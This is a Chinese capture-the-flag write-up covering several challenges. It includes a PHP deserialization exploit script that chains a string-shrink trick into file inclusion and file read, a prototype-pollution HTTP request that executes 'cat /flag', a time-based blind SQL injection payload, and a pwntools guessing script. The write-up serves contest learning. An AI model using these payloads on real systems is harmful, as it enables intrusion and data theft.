之前团队参加了第五届“强网”拟态防御国际精英挑战赛初赛,又是收获满满的一次,和全国很多大佬们一块同台竞争,最重要的是,通过比赛我们学到了很多新的方法和技能,下面让我们一块看看Web,Misc中比较不错的几个题。
一、Web
题目:ezus
通过/index.php/tm.php//%a1?source=可以直接获取源码,打一下就可以获得flag。
<?php
class UserAccount
{
    /**
     * Minimal holder for the two login fields of the challenge.
     *
     * Both properties are `protected`, so serialize() emits their names with the
     * "\0*\0" visibility prefix -- the very marker that object_sleep() /
     * object_weakup() rewrite. The password slot is where the crafted payload
     * (a serialized `order` gadget) is smuggled in.
     */
    protected $username;
    protected $password;

    /**
     * @param mixed $username raw username; left untyped, as the challenge does
     * @param mixed $password raw password; in the exploit this is the payload
     */
    public function __construct($username, $password)
    {
        // Destructuring assignment: same two stores as the original, one statement.
        [$this->username, $this->password] = [$username, $password];
    }
}
/**
 * Make a serialized string "safe" to store by replacing the protected-property
 * marker ("\0*\0", as written by serialize()) with the printable token
 * "@0@0@0@". Inverse of object_weakup().
 *
 * @param string $str serialized data
 * @return string the same data with every "\0*\0" rewritten
 */
function object_sleep($str)
{
    // Single-pair strtr() behaves like str_replace() for one non-empty needle.
    return strtr($str, ["\0*\0" => '@0@0@0@']);
}
/**
 * Reverse object_sleep(): turn every "@0@0@0@" token back into the 3-byte
 * protected-property marker "\0*\0".
 *
 * Note the asymmetry the exploit relies on: a 7-byte token becomes 3 bytes, so
 * any "@0@0@0@" that was part of *user data* shrinks the string without the
 * serialized length prefix being updated.
 *
 * @param string $ob stored serialized data
 * @return string data ready for unserialize()
 */
function object_weakup($ob)
{
    $marker = "\0*\0";
    return strtr($ob, ['@0@0@0@' => $marker]);
}
class order
{
    // Gadget class from the challenge. The constructor and __wakeup() do nothing
    // useful; every sink lives in __destruct(), which fires on the object that
    // unserialize() builds as soon as it goes out of scope.
    public $f;
    public $hint;
    public function __construct($hint, $f)
    {
        $this->f = $f;
        $this->hint = $hint;
    }
    public function __wakeup()
    {
        //something in hint.php
        // The disabled check below would reset both properties to "pass" whenever
        // either differs from it; "pass" is not a valid URL, so __destruct() would
        // then print "Invalid URL" and the chain would be dead. Because it is
        // commented out, attacker-controlled values survive into __destruct().
        // if ($this->hint != "pass" || $this->f != "pass") {
        // $this->hint = "pass";
        // $this->f = "pass";
        // }
    }
    public function __destruct()
    {
        // Two sinks on attacker-controlled properties: include() of $f (LFI) and
        // file_get_contents() of $hint (arbitrary file read / SSRF). Every guard in
        // front of them is a substring or host-suffix check, not an allow-list.
        if (filter_var($this->hint, FILTER_VALIDATE_URL)) {
            // FILTER_VALIDATE_URL only demands a syntactically valid URL; the scheme
            // is unrestricted, so "suanve://..." is accepted.
            $r = parse_url($this->hint);
            if (!empty($this->f)) {
                // "try" and "pass" merely have to appear somewhere in $f; the ".php"
                // suffix is appended after the check and @ hides a failed include,
                // so execution continues to the second sink either way.
                if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {
                    @include($this->f . '.php');
                } else {
                    die("try again!");
                }
                // Only the suffix of the *parsed* host is checked. With userinfo in
                // the authority ("localhost@prankhub") parse_url() reports host
                // "prankhub", while the whole original string is what gets opened.
                if (preg_match('/prankhub$/', $r['host'])) {
                    // NOTE(review): the payload uses a scheme no stream wrapper
                    // registers; PHP then falls back to treating the string as a
                    // plain filesystem path, so the "../" segments walk to the target
                    // file. Confirm this fallback on the target's PHP version.
                    @$out = file_get_contents($this->hint);
                    echo "<br/>" . $out;
                } else {
                    die("<br/>error");
                }
            } else {
                die("try it!");
            }
        } else {
            echo "Invalid URL";
        }
    }
}
// @$username = $_POST['username'];
// @$password = $_POST['password'];
// Local harness: the two POST fields the target reads are hard-coded here so the
// generated serialized string can be inspected before it is replayed in Burp.
//
// Username = 7 copies of the 7-byte token "@0@0@0@" (49 bytes). serialize() stores
// it as s:49:"...". object_weakup() later rewrites each token into the 3-byte
// "\0*\0" marker, shrinking the content to 21 bytes while the s:49 prefix stays.
// unserialize() therefore reads 28 more bytes than the real content -- exactly
// `";s:11:"\0*\0password";s:173:"` -- and then continues parsing *inside* the
// password value, where the forged property below begins. The repeat count 7 is
// tuned to this 173-byte payload; change the payload and it must be recomputed.
$username = "@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@";
// Forged continuation: closes the (now short) username, supplies a fake
// "\0*\0password" property whose value is the `order` gadget, and closes the
// object. Lengths (11, 21, 80) are exact byte counts of the strings they prefix.
// %00 is used so the NUL bytes survive the single-quoted literal; urldecode()
// below turns them into real "\0" bytes.
$password = '";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:80:"suanve://localhost@prankhub/../../../../../../../Users/su/Downloads/fastify/flag";}';
$password = urldecode($password);
// unserialize($password);
$a = new UserAccount($username, $password);
$user = serialize($a);
echo $user;
// This is the string to paste into the request: what the target will store and
// later feed through object_weakup() -> unserialize().
echo "pop:".object_weakup(object_sleep($user));
// Local dry run of the target's own pipeline; note it triggers order::__destruct()
// on *this* machine (hence the local ~/Users/su/... path in the payload).
unserialize(object_weakup(object_sleep($user)));
最后在Burp里面一跑就得到了flag。
题目:WHOYOUARE
这道题目难度系数不高,Burp抓包之后,直接在JSON里做原型污染(constructor.prototype),再通过执行任意命令就可以直接getflag。
POST /user HTTP/1.1
Host: xxxxxxxxx:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 121
{"user":["{\"constructor\":{\"prototype\":{\"2\":\"cat /flag\"}},\"username\":\"admin\",\"command\":[\"-c\",\"-i\"]}"]
}
题目:popsql
通过题目名我们应该就知道,这道题目的突破口是sql注入,直接用benchmark做时间盲注,果然......
sys.schema_table_statistics
sys.x$statement_analysis Fl49ish3re.f1aG123
'password' : f"a'or/**/if((select/**/strcmp(ord(right((select(group_concat(f1aG123))from(Fl49ish3re)),{i})),{s})),1,benchmark(7000000,sha(1)))/**/or'a"
二、Misc
题目:Welcome
这道题是本次比赛的签到题,打开txt就能看到flag了,不再多说。
题目:babymisc
又是一道猜数字题,用二分法逼近即可,脚本如下。
from pwn import *
# context.log_level = 'debug'
# Binary-search solver for the number-guessing service: connect, accept the
# prompt with "Y", then bisect [0, 999999] for at most 15 rounds, steering on
# the words "low"/"up" in the server's reply. On any terminal reply the inner
# loop breaks and the outer loop simply reconnects and plays again.
while True:
    io = remote("172.51.243.74",9999)
    # Three banner lines precede the Y/N prompt (assumed from the service's
    # output; adjust if the banner changes).
    io.recvline()
    io.recvline()
    io.recvline()
    io.sendline("Y")
    #
    low = 0
    up = 999999
    # guess = 454346
    # NOTE(review): 15 rounds cannot pin down an arbitrary value in a range of
    # 10^6 (that needs 20 halvings); the script relies on the outer reconnect
    # loop to retry until a run succeeds.
    for i in range(15):
        guess = round((int(up)+int(low))/2)
        s = ""
        try:
            s = io.recvuntil(b"Please enter a number:")
        except:
            # Bare except: on any read failure hand the session to the user.
            # If interactive() returns, s is still the str "" and the bytes
            # concatenation below would raise TypeError.
            io.interactive()
        print(b"[+]"+s)
        if b"Please e" not in s:
            # Reply without the prompt means the game ended (win/lose); show it.
            print(s)
            break
        # s = io.recvuntil(b"Please enter a number:")\
        print(f"[*] GET {s}")
        # The round() value above is only used to move the bound; the guess
        # actually sent is recomputed as the integer midpoint below.
        if "low" in str(s):
            low = guess
            guess = int ((up - low) / 2) + low
            # print(low)
        elif "up" in str(s):
            up = guess
            guess = int ((up - low) / 2) + low
            # print(up)
        else:
            guess = int ((up - low) / 2) + low
        guess = int(guess)
        print(f"[*] SEND {guess}")
        io.sendline(f"{guess}")
        # The reply that prompted this guess may already carry the verdict.
        if "lost" in str(s):
            break
        elif "flag" in str(s):
            print("flag!!!!!")
            break